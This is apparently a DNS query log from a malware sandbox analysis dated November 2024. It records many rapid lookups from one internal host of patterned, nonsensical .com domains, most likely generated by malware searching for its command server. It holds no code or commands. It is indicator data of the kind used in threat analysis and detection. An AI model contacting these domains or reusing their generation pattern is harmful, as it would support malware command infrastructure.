                                                                                                                                                                                                              Nov 11, 2024 18:33:24.134793043 CET192.168.2.81.1.1.10x8a3aStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.139256001 CET192.168.2.81.1.1.10xcb70Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.142085075 CET192.168.2.81.1.1.10xaafdStandard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:24.142822981 CET192.168.2.81.1.1.10xe24dStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872386932 CET192.168.2.81.1.1.10x7f07Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.872724056 CET192.168.2.81.1.1.10x8629Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.878649950 CET192.168.2.81.1.1.10x6a85Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.879074097 CET192.168.2.81.1.1.10xadb2Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.879461050 CET192.168.2.81.1.1.10x83daStandard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.880053043 CET192.168.2.81.1.1.10xdd86Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.880711079 CET192.168.2.81.1.1.10xae33Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881325006 CET192.168.2.81.1.1.10xb1beStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881342888 CET192.168.2.81.1.1.10xa857Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.881833076 CET192.168.2.81.1.1.10x392eStandard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.882101059 CET192.168.2.81.1.1.10x97eStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.882353067 CET192.168.2.81.1.1.10xed71Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.901201010 CET192.168.2.81.1.1.10x67ccStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902257919 CET192.168.2.81.1.1.10x7ac6Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.902420998 CET192.168.2.81.1.1.10xd13Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.903377056 CET192.168.2.81.1.1.10x5c90Standard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.903531075 CET192.168.2.81.1.1.10xaf78Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905250072 CET192.168.2.81.1.1.10xb534Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905535936 CET192.168.2.81.1.1.10x124Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905750036 CET192.168.2.81.1.1.10x3617Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.905908108 CET192.168.2.81.1.1.10x3ccStandard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.906054974 CET192.168.2.81.1.1.10x10d2Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.906084061 CET192.168.2.81.1.1.10xb62aStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908437967 CET192.168.2.81.1.1.10xf7ebStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908629894 CET192.168.2.81.1.1.10xf47cStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.908859968 CET192.168.2.81.1.1.10xf3d8Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909099102 CET192.168.2.81.1.1.10x9a12Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909383059 CET192.168.2.81.1.1.10xd5dfStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909431934 CET192.168.2.81.1.1.10x8ccStandard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909615993 CET192.168.2.81.1.1.10x38eeStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909770966 CET192.168.2.81.1.1.10xbf6eStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909837961 CET192.168.2.81.1.1.10x2fd3Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.909956932 CET192.168.2.81.1.1.10x8d1aStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910140038 CET192.168.2.81.1.1.10xe71eStandard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910172939 CET192.168.2.81.1.1.10x8082Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910361052 CET192.168.2.81.1.1.10x9ccdStandard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910444021 CET192.168.2.81.1.1.10xf887Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910558939 CET192.168.2.81.1.1.10x988cStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.910847902 CET192.168.2.81.1.1.10xba65Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916373014 CET192.168.2.81.1.1.10x54a3Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916466951 CET192.168.2.81.1.1.10xeb9bStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916594028 CET192.168.2.81.1.1.10xa975Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.916707039 CET192.168.2.81.1.1.10x214Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.917361975 CET192.168.2.81.1.1.10xa84dStandard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918004990 CET192.168.2.81.1.1.10x2b72Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918296099 CET192.168.2.81.1.1.10xbcb5Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918739080 CET192.168.2.81.1.1.10x967eStandard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.918915987 CET192.168.2.81.1.1.10x9ad8Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:26.934840918 CET192.168.2.81.1.1.10x10b9Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.828438997 CET192.168.2.81.1.1.10x3c4Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.829011917 CET192.168.2.81.1.1.10x2979Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.832374096 CET192.168.2.81.1.1.10x7176Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.833671093 CET192.168.2.81.1.1.10x2484Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.848376989 CET192.168.2.81.1.1.10x3109Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.882554054 CET192.168.2.81.1.1.10x6e4bStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.883833885 CET192.168.2.81.1.1.10x2c00Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.889934063 CET192.168.2.81.1.1.10xaab0Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.904782057 CET192.168.2.81.1.1.10xb80bStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.905771017 CET192.168.2.81.1.1.10x502Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.931539059 CET192.168.2.81.1.1.10xdac4Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.944694042 CET192.168.2.81.1.1.10xd578Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.959070921 CET192.168.2.81.1.1.10xab88Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.960376024 CET192.168.2.81.1.1.10x32Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.962456942 CET192.168.2.81.1.1.10xba1eStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.962780952 CET192.168.2.81.1.1.10x96cbStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.966007948 CET192.168.2.81.1.1.10x36c5Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.967757940 CET192.168.2.81.1.1.10x8072Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.970180988 CET192.168.2.81.1.1.10xea4dStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.971553087 CET192.168.2.81.1.1.10x44e7Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.973880053 CET192.168.2.81.1.1.10xffc5Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.975158930 CET192.168.2.81.1.1.10x1a49Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.976653099 CET192.168.2.81.1.1.10xd8a8Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.978796959 CET192.168.2.81.1.1.10xb6d2Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.978924036 CET192.168.2.81.1.1.10xfa9eStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.983283997 CET192.168.2.81.1.1.10xaf27Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.983488083 CET192.168.2.81.1.1.10x2fc7Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.987891912 CET192.168.2.81.1.1.10x855bStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.988720894 CET192.168.2.81.1.1.10xb3f8Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.988909960 CET192.168.2.81.1.1.10x1060Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.989767075 CET192.168.2.81.1.1.10x5a95Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.989948988 CET192.168.2.81.1.1.10xbc18Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.990113020 CET192.168.2.81.1.1.10xfa7Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.990264893 CET192.168.2.81.1.1.10x352bStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.991786957 CET192.168.2.81.1.1.10x33a0Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:27.993551970 CET192.168.2.81.1.1.10xcdf6Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.058887005 CET192.168.2.81.1.1.10x3678Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.059220076 CET192.168.2.81.1.1.10x8815Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.061368942 CET192.168.2.81.1.1.10xea83Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.061764002 CET192.168.2.81.1.1.10xa713Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.100764036 CET192.168.2.81.1.1.10xd7bbStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.101608992 CET192.168.2.81.1.1.10xc38cStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.101969957 CET192.168.2.81.1.1.10x826dStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102195024 CET192.168.2.81.1.1.10xecc8Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102375031 CET192.168.2.81.1.1.10x77d4Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102530003 CET192.168.2.81.1.1.10x82c7Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.102667093 CET192.168.2.81.1.1.10xa400Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104625940 CET192.168.2.81.1.1.10x8dc8Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104775906 CET192.168.2.81.1.1.10xc20aStandard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104811907 CET192.168.2.81.1.1.10xe203Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.104995012 CET192.168.2.81.1.1.10x77bfStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105149031 CET192.168.2.81.1.1.10xe6acStandard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105410099 CET192.168.2.81.1.1.10x62a0Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105638981 CET192.168.2.81.1.1.10xd27dStandard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105806112 CET192.168.2.81.1.1.10x206eStandard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.105943918 CET192.168.2.81.1.1.10xe156Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.106086016 CET192.168.2.81.1.1.10x1131Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.106497049 CET192.168.2.81.1.1.10x95a4Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.106921911 CET192.168.2.81.1.1.10x1b2Standard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.107578039 CET192.168.2.81.1.1.10x9f5aStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.113425016 CET192.168.2.81.1.1.10xf355Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114479065 CET192.168.2.81.1.1.10xeaadStandard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114552021 CET192.168.2.81.1.1.10x8b23Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114655972 CET192.168.2.81.1.1.10xd326Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.114741087 CET192.168.2.81.1.1.10x3f3dStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115201950 CET192.168.2.81.1.1.10x37a5Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115237951 CET192.168.2.81.1.1.10x763Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115426064 CET192.168.2.81.1.1.10x5deeStandard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.115609884 CET192.168.2.81.1.1.10x2ffcStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.116189957 CET192.168.2.81.1.1.10x76d7Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.118343115 CET192.168.2.81.1.1.10x1ac4Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.120902061 CET192.168.2.81.1.1.10xafbStandard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.121144056 CET192.168.2.81.1.1.10x10eaStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.125034094 CET192.168.2.81.1.1.10xe2bStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.132260084 CET192.168.2.81.1.1.10xa72aStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.140161991 CET192.168.2.81.1.1.10x422dStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.140362024 CET192.168.2.81.1.1.10x88b4Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.140664101 CET192.168.2.81.1.1.10x67eaStandard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.141455889 CET192.168.2.81.1.1.10x940aStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.693367958 CET192.168.2.81.1.1.10xcccaStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.696196079 CET192.168.2.81.1.1.10x296dStandard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.698772907 CET192.168.2.81.1.1.10x832Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.698967934 CET192.168.2.81.1.1.10x160dStandard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.703991890 CET192.168.2.81.1.1.10xf4edStandard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.704301119 CET192.168.2.81.1.1.10xc982Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.704663992 CET192.168.2.81.1.1.10xd3a4Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.705024004 CET192.168.2.81.1.1.10x578bStandard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.705302000 CET192.168.2.81.1.1.10x9505Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.705898046 CET192.168.2.81.1.1.10x9062Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.706376076 CET192.168.2.81.1.1.10x1ffeStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.706705093 CET192.168.2.81.1.1.10x6d91Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.707012892 CET192.168.2.81.1.1.10xba81Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.707257032 CET192.168.2.81.1.1.10x9007Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.707634926 CET192.168.2.81.1.1.10xfe77Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.708857059 CET192.168.2.81.1.1.10x358aStandard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.709033012 CET192.168.2.81.1.1.10x38d0Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.709424019 CET192.168.2.81.1.1.10xdc29Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.709841013 CET192.168.2.81.1.1.10x74c6Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.719001055 CET192.168.2.81.1.1.10x7836Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.719170094 CET192.168.2.81.1.1.10x84ccStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.720278978 CET192.168.2.81.1.1.10xb40cStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.720387936 CET192.168.2.81.1.1.10x5c4eStandard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.720710993 CET192.168.2.81.1.1.10x2834Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.729577065 CET192.168.2.81.1.1.10x84e9Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.733486891 CET192.168.2.81.1.1.10xa39aStandard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.733721972 CET192.168.2.81.1.1.10x83e3Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.734002113 CET192.168.2.81.1.1.10x358bStandard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.734165907 CET192.168.2.81.1.1.10x96e2Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.734316111 CET192.168.2.81.1.1.10xcd17Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.737469912 CET192.168.2.81.1.1.10xfc2cStandard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.737673044 CET192.168.2.81.1.1.10x9cf4Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.738007069 CET192.168.2.81.1.1.10xee49Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.738326073 CET192.168.2.81.1.1.10x4e90Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.739866018 CET192.168.2.81.1.1.10xa932Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.749475956 CET192.168.2.81.1.1.10x33dcStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.752393007 CET192.168.2.81.1.1.10x52f0Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.754487038 CET192.168.2.81.1.1.10xcb42Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.798160076 CET192.168.2.81.1.1.10x4a29Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.799439907 CET192.168.2.81.1.1.10x72d9Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.799792051 CET192.168.2.81.1.1.10x599eStandard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:30.800266981 CET192.168.2.81.1.1.10x275aStandard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.410181999 CET192.168.2.81.1.1.10xda97Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.411288977 CET192.168.2.81.1.1.10xbe14Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.411472082 CET192.168.2.81.1.1.10x2ff9Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423105001 CET192.168.2.81.1.1.10x1074Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423130989 CET192.168.2.81.1.1.10x9a96Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423368931 CET192.168.2.81.1.1.10x4b54Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423564911 CET192.168.2.81.1.1.10x8520Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423655033 CET192.168.2.81.1.1.10x431eStandard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423743010 CET192.168.2.81.1.1.10xb35fStandard query (0)gatycis.comA (IP address)IN (0x0001)false
